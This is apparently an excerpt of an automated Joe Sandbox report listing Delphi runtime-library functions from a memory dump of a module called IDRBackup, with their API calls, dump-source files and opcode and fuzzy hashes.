                                                                                                  Function 50028348 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 50028356
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,500283C6), ref: 50028388
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500283C6), ref: 500283A1
                                                                                                  • @Sysutils@StrCharLength$qqrpxc.RTL120(00000000,500283C6), ref: 500283A9
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(500283CD), ref: 500283C0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$CharChar$qqrx27Clr$qqrpvInternalLength$qqrpxcRef$qqrpvSysutils@T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 2156883435-0
                                                                                                  • Opcode ID: 61786a68f427a2116d5208153580c4d6983de50613a64baaa57ab0f0d3e4fb59
                                                                                                  • Instruction ID: 1d01ce25d3aa61c431e68410e02d36fe869a463c4c523e8f2aa4dd5117b6b204
                                                                                                  • Opcode Fuzzy Hash: 61786a68f427a2116d5208153580c4d6983de50613a64baaa57ab0f0d3e4fb59
                                                                                                  • Instruction Fuzzy Hash: 82018F30A06185AFDB01DFB4E96296DB3E9EF44640B9106B7F440D3252E734AF009790
                                                                                                  Function 5001D964 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D9D8), ref: 5001D99D
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001D9D8), ref: 5001D9B0
                                                                                                  • @Sysutils@StrLCopy$qqrpbpxbui.RTL120(00000000,5001D9D8), ref: 5001D9BB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Copy$qqrpbpxbuiInternalSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1472205855-0
                                                                                                  • Opcode ID: d2a7149999e3ca1ca5ee6a783244f8d1fcb7852485f042ca67bcb824e4d164b7
                                                                                                  • Instruction ID: c11af60418324f05763cb7e6f29752fa05ca89a2dc4a7eae182604277afe3d4f
                                                                                                  • Opcode Fuzzy Hash: d2a7149999e3ca1ca5ee6a783244f8d1fcb7852485f042ca67bcb824e4d164b7
                                                                                                  • Instruction Fuzzy Hash: 05016231710E85AFAF01DFA9DD9285DB3F9EF8820079046B7E504D3611EB709E42D651
                                                                                                  Function 500269DC Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500269ED
                                                                                                  • @Sysutils@LoadStr$qqri.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A0F
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A1D
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A28
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20LoadMetaRecxiStr$qqriStringStringpx14Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2765079483-0
                                                                                                  • Opcode ID: ce2d3a5686d0a63d1e0902a166e3335a6fa43bf775ea014feb5ef3839ae02889
                                                                                                  • Instruction ID: 29fd1fbf12b5fecb8cf52ab6bc17093bc504a80d2aac76fc4f53b572846cc74c
                                                                                                  • Opcode Fuzzy Hash: ce2d3a5686d0a63d1e0902a166e3335a6fa43bf775ea014feb5ef3839ae02889
                                                                                                  • Instruction Fuzzy Hash: EA01A275600289ABD700CE94EC91E9EB7A9EF89720F918362F904A7740DB30EE01CAD1
                                                                                                  Function 50026A78 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026A89
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AAB
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AB9
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AC4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20LoadMetaRecxiString$qqrp20Stringpx14Stringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2968566035-0
                                                                                                  • Opcode ID: 817dbf46161607a9b669e8961ae92c471a57c141c410dc2a02020cdf9f22e400
                                                                                                  • Instruction ID: a4508fb9ca55fcdc9539e334686b33a01e34f88c829117d28a676305680eca9a
                                                                                                  • Opcode Fuzzy Hash: 817dbf46161607a9b669e8961ae92c471a57c141c410dc2a02020cdf9f22e400
                                                                                                  • Instruction Fuzzy Hash: 9001A235601689AFD700CF94EC51E9EB7A9EF89620F918272F904A7740DA31EE01CAE1
                                                                                                  Function 5002671C Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002672D
                                                                                                  • @Sysutils@LoadStr$qqri.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 5002674F
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 5002675D
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 50026768
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20LoadMetaRecxiStr$qqriStringStringpx14Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2765079483-0
                                                                                                  • Opcode ID: 82797bbb40d43ac66670649aa24e2307c392cdea19954696096313799db10cbd
                                                                                                  • Instruction ID: beac2be98222c8cf5cd228bb1a13cdf081a6ca164530b3398e22c63253403a1c
                                                                                                  • Opcode Fuzzy Hash: 82797bbb40d43ac66670649aa24e2307c392cdea19954696096313799db10cbd
                                                                                                  • Instruction Fuzzy Hash: F0F0A4356052886BD700DA94EC92E9EB7ADEF99760F918362F90497340D635AE01C691
                                                                                                  Function 500267B0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20LoadMetaRecxiString$qqrp20Stringpx14Stringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2968566035-0
                                                                                                  • Opcode ID: eb8dbeff97980f41212820df1590c374e9b04be7e90399179c1a7d1c7f44e779
                                                                                                  • Instruction ID: 59d3e7adbb39bbbd23096f0306fd7bc4bc599d625c45f80d349e960b686eec1b
                                                                                                  • Opcode Fuzzy Hash: eb8dbeff97980f41212820df1590c374e9b04be7e90399179c1a7d1c7f44e779
                                                                                                  • Instruction Fuzzy Hash: 58F0A9356016886BE710DA94EC52E9EB7ADDF85710F914372F90497341DA35AE01C6D1
                                                                                                  Function 50010598 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500105AC
                                                                                                  • @System@TObject@ClassName$qqrv.RTL120(00000000,50010608), ref: 500105C6
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,50010608), ref: 500105E8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,50010608), ref: 500105ED
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$ClassSystem@@$ClassoCreate$qqrp17Except$qqrvException@$bctr$qqrp20MetaName$qqrvObject@RaiseRecpx14RecxiStringSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2276446640-0
                                                                                                  • Opcode ID: a47437a02414486e94db703e65b95041672a09583fc297ca935734f4a65545cb
                                                                                                  • Instruction ID: 7635616e979078c9aaefdf8b0fdb21b021419f1ddeeb6f58034bbde12a420e8e
                                                                                                  • Opcode Fuzzy Hash: a47437a02414486e94db703e65b95041672a09583fc297ca935734f4a65545cb
                                                                                                  • Instruction Fuzzy Hash: 6D01F934D04688AFE714CFA4ECA19AEB7B8EB45310F8083A6F854D3380E7315A00CA91
                                                                                                  Function 5002D210 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@DynArrayAddRef$qqrv.RTL120(?,?,00000000), ref: 5002D21E
                                                                                                  • @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,?,00000000,5002D27D,?,?,?,00000000), ref: 5002D241
                                                                                                    • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002DC60
                                                                                                    • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002DC65
                                                                                                    • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DC88
                                                                                                    • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DC8D
                                                                                                    • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCB0
                                                                                                    • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCB5
                                                                                                    • Part of subcall function 5002DC38: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002DCBC
                                                                                                    • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCE1
                                                                                                    • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCE6
                                                                                                    • Part of subcall function 5002DC38: @Sysutils@TEncoding@GetCharCount$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,?,?), ref: 5002DCF3
                                                                                                    • Part of subcall function 5002DC38: @System@@DynArraySetLength$qqrv.RTL120(?,?,?,?), ref: 5002DD0D
                                                                                                  • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%.RTL120(?,?,00000000,5002D27D,?,?,?,00000000), ref: 5002D24E
                                                                                                    • Part of subcall function 5002D730: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
                                                                                                    • Part of subcall function 5002D730: @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                    • Part of subcall function 5002D730: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                    • Part of subcall function 5002D730: @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D284,5002D27D,?,?,?,00000000), ref: 5002D269
                                                                                                    • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                    • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D284,5002D27D,?,?,?,00000000), ref: 5002D277
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$Sysutils@$ArraySystem@$DynamicSystem@%$Encoding@$Except$qqrvException@$bctr$qqrp20Length$qqrvRaiseString$Recpx14Recxi$Array$tb%Array$tuc%iiBytes$qqrx24Clear$qqrrpvpv$Array$qqrpvt1uiArray$tb%iir25Array$tuc%iByteCharChars$qqrx25Count$qqrx24Count$qqrx25FinalizeFreeMem$qqrpvRef$qqrv
                                                                                                  • String ID:
                                                                                                  • API String ID: 306697395-0
                                                                                                  • Opcode ID: 70b8e1b795e1d37dd9de12cc76fc3247445453c6de169292efa2efb0df9a22ae
                                                                                                  • Instruction ID: 5ec251f640e733fb77e8b4a269d7085e3b95d1142e22d4d9b3bdac147b7f947c
                                                                                                  • Opcode Fuzzy Hash: 70b8e1b795e1d37dd9de12cc76fc3247445453c6de169292efa2efb0df9a22ae
                                                                                                  • Instruction Fuzzy Hash: DB01AF74205649EFEB04CF94FC91C8E73E9EB5C710BA18266FD0493750D630EE06CAA0
                                                                                                  Function 5000E884 Relevance: 7.5, APIs: 5, Instructions: 39libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 5000E8A8
                                                                                                  • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(00000000,5000E8E7,?,?,?,00000000), ref: 5000E8BB
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000E8E7,?,?,?,00000000), ref: 5000E8C3
                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 5000E8CA
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000E8EE,?,?,00000000), ref: 5000E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AddressAnsiProcStringSystem@%$Char$qqrr27Char$qqrx27Clr$qqrpvFromT$us$i0$%T$us$i0$%pbus
                                                                                                  • String ID:
                                                                                                  • API String ID: 107858258-0
                                                                                                  • Opcode ID: 3cf80b2481eac8ac2a36653dc93b19aa85d9f1d37a2655b46f373c6b8d52bf22
                                                                                                  • Instruction ID: e43e5a50d2d678b4319a06595b8d852140739d2f680c724791b48c723902c0e4
                                                                                                  • Opcode Fuzzy Hash: 3cf80b2481eac8ac2a36653dc93b19aa85d9f1d37a2655b46f373c6b8d52bf22
                                                                                                  • Instruction Fuzzy Hash: 88F062306091C86FF701DE94DC61A5D73DCEB4D250FD18172F944A7241DA30AE0097A4
                                                                                                  Function 5002CDEC Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000), ref: 5002CE17
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000), ref: 5002CE12
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000), ref: 5002CE39
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000), ref: 5002CE3E
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(?), ref: 5002CE52
